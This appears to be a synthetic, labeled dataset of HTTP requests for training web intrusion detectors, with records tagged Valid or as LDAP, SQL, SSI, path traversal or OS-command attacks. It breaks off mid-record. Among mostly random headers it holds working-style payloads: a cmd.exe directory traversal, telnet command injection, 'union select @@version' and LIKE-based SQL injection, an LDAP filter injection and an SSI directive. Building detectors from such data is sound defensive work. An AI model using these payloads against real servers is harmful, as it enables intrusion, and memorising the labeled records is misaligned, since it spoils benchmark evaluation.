Accept-Charset: x-mac-hebrew;q=0.6, iso-2022-kr, shift_jis, iso-8859-9
Accept-Encoding: *;q=0.1
Accept-Language: imuen-ow1ha;q=0.1, deLeev-tgoa;q=0.0
Cache-Control: no-store
Client-ip: 245.254.197.131
Cookie: ozoaa=6iH9BoQD;jpv1huee=igx@;ia=fetcifobidivsr+\u
Cookie2: $Version="28"
Date: Mon, 02 Jun 08 16:57:46 GMT
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sat, 08 Apr 06 07:12:10 UTC
If-Unmodified-Since: Tue, 07 Feb 06 15:34:58 UTC
If-Match: "cUUktjRxy1eKPf5mhte"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 704
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 484-6716,4-82,-34
Referer: /odlue.aspx
TE: chunked;q=0.4
Trailer: TE
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 7.5; 3o-ho; rv:4.0.3) Gecko/66893979
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: HTTP/9.0 www.repd5thy.shtml, HTTP/1.7 www.bail.jpg, HTTP/2.1 www.eetiee5e.js
Transfer-Encoding: cdeup1
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 707 233.213.218.176:22416 "2pjtanyoNbt" "Mon, 22 Mar 10 21:57:09 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44758
Start - Id: 17739
class: Valid
GET /oDvr/nIiseo.html? HTTP/1.1
Host: 248.243.238.29
Connection: utDoSx
Accept: application/*;q=0.3, video/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n5el2sfo-es;q=0.5
Cache-Control: max-stale
Client-ip: 66.109.210.39
Cookie: tth5es=nh;baep=tCS
Cookie2: $Version="262"
Date: Sat, 17 Nov 07 11:52:38 CET
ETag: W/"at7mVWpgGuw1T4U"
Expect: oyegenbz=nrtt
From: laaio@nrb4neWtwh.gov
If-Modified-Since: Wed, 31 Oct 07 05:51:19 GMT
If-Unmodified-Since: Thu, 05 May 05 07:06:02 UTC
If-Match: "CbM6ESaF@w3MZ_lEbxY"
If-None-Match: *
If-Range: "xr8vporsRrfTm3U6WVpG"
Max-Forwards: 186
MIME-Version: 4.2
Pragma: l6rl3=m
Proxy-Authorization: zEte 4clo9ebe=enFNEn3b
Authorization: frorea epfrth=esLwmh
Range: -42
Referer: /ostlas/caTe/6tohcsn/02oo6r3e/rhtmf3.aspx
TE: deflate
Trailer: If-None-Match
User-Agent: nt4t/0.0
UA-CPU: x86
UA-Disp: 8841,8953,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 582x198
Via: FTP/6.2 www.ycethoca.html:6, FTP/7.4 119.180.254.9:8, HTTP/4.7 20.146.147.130
Transfer-Encoding: identity
Upgrade: zhu/2.1, eAh/4.1
Warning: 725 124.182.181.17 "nnnetcsfa" 
X-Forwarded-For: 102.74.69.231
X-Serial-Number: 197606037
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 17739
Start - Id: 39003
class: LdapInjection
PUT /yv6.shtml? HTTP/1.1
Content-Length: 262
Content-Language: adL,saRoHaT,Lici
Content-Encoding: compress
Content-Location: http://www.iEoy3Knn.be/loeoksn/Eoffhe/nieDiuyh/0w4hc.asmx
Content-MD5: RmJsdHJuQm5Fb3JvdHVsYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Wed, 11 Oct 06 22:46:49 UTC
Host: www.loPweh.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-950, euc-jp;q=0.5, euc-cn;q=0.8, windows-1258;q=0.6, iso-2022-kr
Accept-Encoding: deflate;q=0.2, identity;q=0.5, deflate;q=0.5, gzip;q=0.9, identity;q=0.8
Accept-Language: fEashol-0u, amsJThde-Uu7ldd;q=0.1, oi8tFe-eaEl;q=0.6
Cache-Control: Bs='dts'
Client-ip: 205.198.95.102
Cookie: eoeesetuero=tPer;sathhAD=Rhlom;e6al9=7;caeeaet=udivy-lrta 
Cookie2: $Version="008"
Date: Fri, 05 Mar 04 15:55:39 CET
ETag: W/"VPJnp3@veVviL60"
Expect: seohe
If-Unmodified-Since: Sat, 19 Sep 09 17:15:23 CET
If-Match: "xzYVfw_5@It4i0lNBG8"
If-None-Match: "NK_Ynt9S.qtIvuB4MAr"
If-Range: *
Authorization: Digest nonce
Referer: http://mgoeratt.net/netHn/prROob/luhDt/ncgaYTjp.wav
TE: chunked,trailers
User-Agent: ) (    |   (displayName=had*)  (name  =had*)(    mail=had*   )
UA-CPU: x86
UA-Pixels: 1899x922
Via: 8.1 172.112.26.215, 4.7 53.139.234.226, T7nnCn/7.5 229.54.231.42
Transfer-Encoding: gzip

rUtios6g0rt=eaIunionaa&os3ajdnc3=DTW6bFttmeoo&vzR9Kp=rhefyssmioecbi &BW.K=er&sm4enT5ih3dt=re6a&XpbzGmudrop=uZj-&thfmmdch=aKmNZThmr&navaa=t6d&Phoi2=444&gEWkperlhttpsK=>ysystemotEtli&mo1otnmsn=020&onecua=eaooht6:iaeaocepy&eidtsgt8i5bi=erhiconnect&a0=gb1JvoFD0_

End - Id: 39003
Start - Id: 45823
class: PathTransversal
GET /uCv.php3?tmpnetcat-822=shutdownnqlA&nra=50&DZ2h=e%27s%5Does%28oi&Ni_h.@8etcpQ=07672&eoT=4760&pnta4Us=%5Cautoexec.bat&toubetePpteei=620720&eliw=0789338&dAc5eak6ea1Sn7=9hrtlinkneIiH2p&mke=of2&tx5b@Twp=ed%3F&mtcosnirtl=ia5ul&hwlertEq=4 HTTP/1.0
Host: 138.200.152.232
Connection: keep-alive
Accept: video/mpeg, application/x-tar, audio/basic;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Cookie2: $Version="357"
Date: Tue, 13 Sep 05 22:33:57 UTC
ETag: "h.CQTk1LWjNJ12m-P1ot"
Expect: tons32
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-None-Match: *
If-Range: Mon, 04 Apr 05 08:34:55 CET
Max-Forwards: 402
Proxy-Authorization: NTLM YXJhZmpjaHJlemlsZWNwbXJ0YXVuc2VlaUF0YWQwRXNSb3R5Y2w=
Authorization: Basic ZWNocmI6ZUhzZ3ZFemc=
Range: 09236-
Referer: http://tra5.biz/7y60yto4/elolaa/aosSSgtu/eIuaOsht/caae.mp3
TE: gzip;q=0.4,gzip;q=0.8
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 7.2; cp-te; rv:3.5.8) Gecko/85262333
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: 90jj; wrpOnS=sugt
Upgrade: oeqAi/2.8, azod/4.0
X-Serial-Number: 25397478987579

null

End - Id: 45823
Start - Id: 43772
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.gteF.ch:0
Connection: close
Accept: audio/*;q=0.7, application/rtf
Accept-Charset: x-mac-hebrew;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: aahe-dfJykbi, bt17iho0-SDbiecdu, nfeaLwii-o;q=0.5, ciineZwn-rpfaNL;q=0.9, hws-nt;q=0.7
Cache-Control: max-stale=8584
Client-ip: 111.17.94.212
Cookie: teJTos=yauhhtonoeatrcpar;0eanfeqeIedna4=213517;9uoo=01069;ten=ni5LimTereed617sek
Cookie2: $Version="143"
Date: Tue, 17 Jun 08 15:46:41 GMT
ETag: "jz@gJWZ7STu9UBH8J@"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Tue, 11 Oct 05 17:32:48 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:27:44 UTC
If-Match: "TA5Ul3_kyVRwbqsEZBPT"
If-None-Match: "K60_PkDrhfFiNze"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.5
Pragma: reet=aek
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://www.lNnh.net/T8itcC/4swat/0tek3ch/qjpo/tUl5T.aspx
TE: chunked;q=0.7,trailers
Trailer: From
User-Agent: Mozilla/2.3 (compatible; ffetaa; Windows NT; n1dhdevm9; u0ya; qtsnerjpm)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: iovfod; oustwbe=qNORAam
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 85.158.30.227
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43772
Start - Id: 15486
class: Valid
GET /2IfPp-5XXpjcTh@kEidR/OPBUtGkuVA/w4/KS/hxm4ngIaraea/oa/nbnu9rtdisEtrecgan/pXn/uOJk.dll?0rnMnsmrie=ceRDUSK8%40oT&nt=eion HTTP/1.1
Host: 13.12.12.35
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 108.57.201.137
Cookie: fcUKainputC9i=4;hyode=s 
Cookie2: $Version="792"
Date: Sat, 26 May 07 22:31:47 GMT
ETag: W/"zWa.Yk9oQNSrS_BZqt"
Expect: dnwr
From: ense@reotnih1w.cz
If-Modified-Since: Wed, 13 Jun 07 24:07:36 CET
If-Unmodified-Since: Mon, 18 May 09 02:31:00 GMT
If-Match: "xgTCi2vj7eIoN_vCe"
If-None-Match: *
If-Range: Sun, 27 Mar 05 07:25:08 CET
Max-Forwards: 5
MIME-Version: 0.6
Pragma: hrfjeafa=n7oeIoe
Proxy-Authorization: NTLM bWxyd2FvRUYwYWlwbzNvYWRlcmZUb2VzM2h1dE5MbDdndGRuZWE1cng4aWFvZQ==
Authorization: Basic cWxvbjpjbmhv
Range: 14-
Referer: http://www.RTsolsg.be/afnuf61r/szrste/r0atl/3ntailoh/itatss.cfm
TE: gzip
Trailer: Date
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 0.7; ee-st; rv:0.2.3) Gecko/97485899
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1725x7516
Via: HTTP/3.0 201.254.224.172, aip/5.5 www.9idedao.html, 9nteIo/8.5 167.162.247.95
Transfer-Encoding: compress
Upgrade: cwynn/5.0, lsm/0.3
Warning: 740 www.tindaC.shtml:1990 "frsnphme2n4i5tcrd" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 7867175
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15486
Start - Id: 39286
class: SSI
GET /3rQ3X.bin?giwTuhayeie=i&1thcceptqwdoad=5&h5aykae1vrrbE=es%24hac%5Ctq%26jiaE&Oacih2rmtt8fhw=476&oatupinFegwn=f8XZMlk&Ll=p%40Sdn.lJ07l&1oveeaepzodrl=r5r2&onf6onoazixt3ud=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 69.112.48.243:1
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, windows-1254;q=0.3, x-mac-ce;q=0.9
Accept-Encoding: *
Accept-Language: dvn-snapl1r;q=0.9
Cache-Control: no-cache
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="4"
Date: Wed, 15 Jul 09 10:57:25 CET
ETag: "CUCQhxU27N0NfVaIB"
Expect: teiRi02f=tsen
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 26 May 09 07:31:29 UTC
If-Unmodified-Since: Wed, 30 Dec 09 20:17:41 GMT
If-Match: "a.ElCHPmTp94qg9Mx"
If-None-Match: *
If-Range: Tue, 14 Aug 07 19:11:14 UTC
Max-Forwards: 8026
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: 2ehebr earold=vh8oet
Range: 419016-,344-
Referer: /tvhiAtz/pShad/1thC9.jpg
TE: chunked,deflate
Trailer: Upgrade
User-Agent: Mozilla/4.7 (X11; U; Unix 3.8; ES-Sn; rv:1.4.5) Gecko/17882133
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: deflate
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 171.227.11.27
X-Serial-Number: 729426151535484
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39286
Start - Id: 7972
class: Valid
PUT /w1zJs4M/svZaN2Gv3tt/idfrmcscb1/-g9/ozzeeTarceral9tdn/mketggdtcnoewkense/5delanca1egTr4o39/rCSwRDK/wNsweM/8UY3v4VpTM/uY.js? HTTP/1.0
Content-Length: 113
Content-Language: 3ip
Content-Encoding: deflate
Content-Location: http://www.szee.st/7heatl/eRavuRd.mp3
Content-MD5: bHRqb2V0Y2VzaG5zem9udA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jul 06 18:45:21 GMT
Last-Modified: Fri, 23 Dec 05 02:56:43 CET
Host: www.jidnLgipk.de
Connection: 8arhsj
Accept: application/rtf;q=0.9, image/png;q=0.2, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: msDi-wp, i-otnlec;q=0.4
Cache-Control: no-cache
Client-ip: 163.108.182.17
Cookie: eaiWoadveg=dropfranwT;HNExp_F=35;blte=AIhe8i/is2aoi;mhcA0z=x I8cqxI-eefr+x
Cookie2: $Version="50"
Date: Fri, 03 Oct 08 10:28:46 CET
ETag: "vSwg.t8VN@YH431HW"
Expect: ta4ibo1g
From: eedf0au@eYilizod8t.de
If-Modified-Since: Thu, 08 Jan 04 17:33:03 CET
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: "E@CeRKIdnKoyNa6n"
If-Range: "bO4smO9q_DIDByPWQFr"
Max-Forwards: 64
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -607
Referer: http://isau.it/szEa/tnhea.dll
TE: trailers,gzip,deflate;q=0.6
Trailer: User-Agent
User-Agent: ocieqs5l5/0.2.6.8
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 0.0 www.ieeur.tiff
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: ---------------
~~~~~: ~~~~~~~~~~~

EamnErcop=10545357&anehv=5f:stxdm&dtlntitlnc=rFEUjN8&fdk=646454&ta0rwmiewottgwa=id/body&9nNorOmljn=9&nrzhna=g

End - Id: 7972
Start - Id: 36728
class: OsCommanding
GET /P@ks/nabIapa4ja7KKyn/e3mnho2eotjlae0.php?lLvvzl1trcebgh=93272519&Eebs4awgOeuae=e4pZf&Q-inputyXm=210132&rap6va5alege=30&ztselmshue64sS=%22+%3B+telnet++++250.140.199.173++80++%3B&Te3egGR=ksrtDahM&oTs3iaierncujse=lhroiax&t81dre=0eqdsco%2Fteyee&y2coiehinn=y4kI&7iZ9z_b6yXservicesc=fnXfXhx&h5icqpn=8756135636&tb=%5D%24nmsa&lkhirta4UtiWlbi=hhcdoioh%5CnrSitm&lkWUihxNc0=gp0rtnss1t&drdobiltnOijet=%27gh HTTP/1.1
Host: 165.180.117.244
Connection: mcwtphcy
Accept: application/*;q=0.8, text/xml, video/*
Accept-Charset: iso-2022-jp, iso-8859-2, x-mac-turkish, x-mac-icelandic
Accept-Encoding: *
Accept-Language: b0fte-sstEt, ebao2-thn;q=0.7, Ev-use
Cache-Control: no-cache
Client-ip: 38.98.48.204
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="6"
Date: Tue, 29 Dec 09 15:34:28 CET
ETag: W/"ED3bEWlrdsC7qV@8t"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 18 Nov 06 16:31:32 CET
If-Unmodified-Since: Mon, 29 May 06 12:53:58 GMT
If-Match: "3QeRzG0sc@-a20O"
If-None-Match: *
If-Range: Mon, 03 Oct 05 22:11:27 UTC
Max-Forwards: 241
MIME-Version: 6.4
Pragma: btudd8=afse
Proxy-Authorization: Basic bVhudGVvbDplU3Rtc3I=
Authorization: Digest response="18BBA6CC47843347fa6D8aeE033EC1Fd"
Range: 17833-,074264-927,-3
Referer: http://www.Ed3o.gov/oeyj/naauxdn/tBsorcAf/viEet/ltaofoW7.nsf
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: mrorone (939Dku0gj; amnz3Vv; 4BVlj-)
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: FTP/1.9 www.a8n6pa.css:5012
Transfer-Encoding: compress
Warning: 028 www.eo6itwta.css "IsnphdAiybeogei" "Tue, 31 Aug 04 23:00:46 GMT"
X-Forwarded-For: 135.18.204.64
X-Serial-Number: 5966336
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36728
Start - Id: 35239
class: SqlInjection
GET /ihdMlp/qep/esU3I9F1jlOZ6j_PnNDt.html?nosheaanheb6p=015&exi9=+htie&J1f@Ztls=%5Bre70&r6a=svrindcidi&nsetedea=039&ldmn=984&sea5tplteaa0se=uCjg&CdQNoF=e8t0&h1u7gapio1=atfeod%2B%26e&23ocEetgesEh=519386520&iuittr=%27+OR++%27acun66%27+LIKE++%27aze%2525&stYVidAwai=zqCGa8%40SN&ddtetmsnae=96292 HTTP/1.1
Host: 73.220.115.207
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: a=cxj
Client-ip: 61.19.198.20
Cookie: d9lodyrs3sn=sautpi7dka0rosib;fi7perbs7Ots=likeze hna+G;rcchyns= t=;mNpae8=712342;neplA=pg
Cookie2: $Version="55"
Date: Thu, 21 May 09 06:55:07 GMT
ETag: W/"nMX2urdi29dkIXdpcQr"
Expect: 100-continue
From: 5hesne@oeee.uk
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Wed, 01 Feb 06 07:14:54 CET
If-Match: "dhw15933UJpsvGj@F"
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 4359
MIME-Version: 1.1
Pragma: dmavn=pnm1wyI
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Digest username="Ae8Ahn"
Range: 233007-
Referer: /tttrDa.exe
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: agonSf0
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 5.2 231.32.133.3, 8.4 www.ulTraa.js
Transfer-Encoding: compress
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35239
Start - Id: 11780
class: Valid
GET /sMGbhHEYZ0I4ra8ihOu/xaPxoLal7ft5oo/iqsGta_HL0NN_tT/iIfSpadchn/0MZYMUeB/h2rOeeodada0/aP.htm?eeeHsuh0oe=gANk&Ee=dj_T&-a.qW48O=db HTTP/1.0
Host: 24.118.172.120
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1252;q=0.0, iso-8859-8-i, windows-1251, windows-1250, x-mac-korean
Accept-Encoding: gzip, gzip;q=0.9, gzip;q=0.7
Accept-Language: T-czymgmI;q=0.8, lcrtn-pydsEra;q=0.2
Cache-Control: dyut='ei'
Client-ip: 210.1.7.169
Cookie: tai5smusomR=;\exterm
Cookie2: $Version="380"
Date: Mon, 31 Jul 06 20:16:33 CET
ETag: "lpSggRrMvgirpOIBHva7"
Expect: 100-continue
From: rliCtemd@rOnoI.fr
If-Modified-Since: Fri, 30 Jan 09 16:27:09 UTC
If-Unmodified-Since: Sat, 04 Nov 06 15:49:22 CET
If-Match: "IJSVJmTGjD_5L0hzpuJ"
If-None-Match: "vO98C7o1DvoqfApdV"
If-Range: Fri, 09 May 08 10:45:51 CET
Max-Forwards: 88
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM d3lkaWNyY2FycGtyZXVqdGVlY3BlbnNpU0FpU2ZsZWFu
Authorization: NTLM YWxlbTVyZWVsZENlb1NFczVlcGFpZW5lMHNlZTBucGRlQWE=
Range: 9-947069
Referer: http://www.slqe.com/wLqao.jpeg
TE: deflate;q=0.5
Trailer: From
User-Agent: Mozilla/4.6 (X11; U; Solaris 7.2; aa-28; rv:1.2.4) Gecko/72940678
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0954x9922
Via: 1.1 www.3nwzetw.jpg, 9ieR0/7.0 150.83.181.159
Transfer-Encoding: ei7cnl
Upgrade: Mte/9.1, 2vo/9.2
Warning: 864 www.odc5ns.htm "tlwt73eSeidle" "Sat, 17 Jan 04 09:21:50 GMT"
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 236412892
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11780
Start - Id: 36649
class: OsCommanding
GET /L8w/azq4Zs21MzFkN3z2OBJ/nodoeheeesnlan9/oIh_LhtaccesRIO/e8BxemE79/ao26Hh2AzS/djScDX.AL/63kMhc2/do/GXbUdIJnH/5C8EqZnull-zCAF/i-b.js?aiirees=eka&im0msct=111.177.21.68+++%7C++++dir&msmnebo0i=hde&yr=102263&rtc4o1cActj4=i&I3DnjSEK-=rcpnan&pbhgem8dednmb=cfgj7RjUw&asqo9oakindcys=ffioiri8h6NGs&67oeeaoafetco=47390864&gsfyEiopl2o=3&h9etcD=4327&3t=a%3A&7ieaendrayrhom=%7E&ohpK8nhu=0rdettizRo HTTP/1.1
Host: 193.116.194.146:26309
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, iso-8859-8-i, windows-1255;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: Gjmln-je;q=0.6
Cache-Control: min-fresh=0
Client-ip: 83.248.187.250
Cookie: slMr=u8Ipihde;T3libvkd=icepZ@iK4;IN1gS7hGSbP=;9>e5llnStvdinouE4;tlulodsdjxcci=1589801
Date: Sat, 09 Feb 08 17:10:30 CET
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-None-Match: "fxcnY@8YDHA4PQc6"
Max-Forwards: 4745
MIME-Version: 8.5
Authorization: NTLM aHd3cmFpaWJuMnd5YW85bnJvbmllYWl3ZWZOQ2VpYWVlZWV5Y2FuY2ZldA==
Referer: http://Aushpym.gov/nat6hgg/7htbnh/eoccsYh/spdpo/Ts2bet2e.shtml
TE: chunked;q=0.4,gzip
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 8.2; hS-ha; rv:0.4.0) Gecko/59396054
UA-CPU: Sparc
UA-OS: Win9x
Via: vedhEm/1.6 2.226.204.122, nasTye/0.7 189.32.35.80
Transfer-Encoding: gdhi; tept=for7
X-Forwarded-For: 31.147.201.7
----: -----------------

null

End - Id: 36649
Start - Id: 27230
class: Valid
GET /e7iqT40Rta/IcmeF/D8.i7iSG1h0/rKTu6zfm8r/ah/sv@neJXz/TeaEu/S1Qginbodynph-7/had4deNhZcokmunae/s5migeaaernOURreo/7x8/V85R.msf?rpnthgPsmoedM=69&wSidU1mV=0604&jYNfu=g&np=h6T&lince5iesol=5lrDihincludenhdcnt&H_clPwKklib4e=bmb5cupe&dkhramh9escetc=atnjesTato&fyyhn=eGhkXSZPT&uJPperlEEofn=OrthdtbeeiexLredi HTTP/1.0
Host: www.iott.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rnwqsS7-bgoaar;q=0.7, htw-eanp;q=0.8, be-mehwoa, nd-xbc, oteu-j;q=0.3
Cache-Control: max-stale=1294
Client-ip: 118.249.27.115
Cookie: osei6Nouozw=008981131;xalertnde=569;qinsertnodecopykR=a;U1wVdocumentVOHsUg=noj;isiad5L=dseoor5
Cookie2: $Version="0"
Date: Mon, 24 Aug 09 01:31:31 UTC
ETag: W/"mJ3BakuwqjZGER1OKw."
Expect: ura0iee=ainoktv;6nste
From: el3tal@tATotto.st
If-Modified-Since: Tue, 20 Apr 04 14:57:43 UTC
If-Unmodified-Since: Thu, 03 Jan 08 04:34:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 13:54:36 GMT
Max-Forwards: 605
MIME-Version: 6.9
Pragma: 0=tsh
Proxy-Authorization: Digest realm
Authorization: NTLM c29XcG9jbnAwbHR1ZXhlRmVvb2FvcWJoc3lhczhvdHBzY3N1c3I4bW9udA==
Range: 075-196
Referer: /gDSwbb.css
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: fyhsuta5 (y_KMiFd; f8S2p_; oU64SRIT; a_l5NK)
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: HTTP/8.9 245.140.174.186, HTTP/7.5 www.oneEhll.htm:0, HTTP/0.3 www.hnes7d0.png
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 863 121.115.212.192 "PtcshIr" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 907247306873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27230
Start - Id: 17579
class: Valid
GET /iwindow.opendIy81WO/onmhcr.gif?uT=qj7HicWSfgL HTTP/1.1
Host: www.oImw.gov:2424
Connection: keep-alive
Accept: application/x-tar, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 177.96.5.81
Cookie: JdtXifirt=781228;uiadnfcsmnskoyl=execel';xyITa6XG0T=eNjWoadQSen;vraearsmle8yae=srqdnb ih;Rkstr0tcatefoq=@xmlohg;ollauzhu=569729
Cookie2: $Version="1"
Date: Fri, 31 Jul 09 17:24:42 CET
ETag: "CAjY4qra185GoVI_"
Expect: mmhrajb=oec8ye;jmRai=uuxlaf
From: eczairnn@8nwil2emd.be
If-Modified-Since: Wed, 02 Sep 09 19:59:58 GMT
If-Unmodified-Since: Tue, 16 Oct 07 08:35:47 CET
If-Match: "pw7w_P_9hGXVhrePEH2"
If-None-Match: *
If-Range: *
Max-Forwards: 751
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: 6ntWaw hdbq9ss=xFLmam
Range: 22389-71,-169,-0
Referer: http://nnant.gov/nemt2/ecHv.cgi
TE: chunked
Trailer: From
User-Agent: Dn7iseait9taUm
UA-CPU: x86
UA-Disp: 209,146,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 0.8 www.ouK58q5m.jpeg, 4.8 228.99.192.87
Transfer-Encoding: deflate
Upgrade: httos/8.2, cIe/0.7
Warning: 850 30.15.58.94 "mnoam98ReceIhnimaf" "Sat, 01 May 04 04:54:14 CET"
X-Forwarded-For: 108.95.130.193
X-Serial-Number: 2432854713
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17579
Start - Id: 41755
class: SqlInjection
GET /nreimrLrg1slavGft/naafseeSyIq/onq/8xGPOyd-/qnyULwLR/replace73gTwindow.openctelnethTFfVmeta/orme7bnomsttdalhsrc1/eFNoDS0_Hg/dxOXU/eyR/Ertisauwt7dDa.jpeg?24.S.ajFVst=bo3eaetEensd&2katRN=qiOe&ni=sar+t%28pfd&hpa=ndhen8eeRhEziap2i&bt=445133&RXXfqny4iW=7f&sohtI=838821&vqRMM4g=%27++union+++++select+%40%40version%2C1%2C1%2C1--&sZ=aeiio&P5qdrbos3Stf=nch&m3ntnaqiatloa=3whereaisadns HTTP/1.0
Host: 226.84.93.83
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
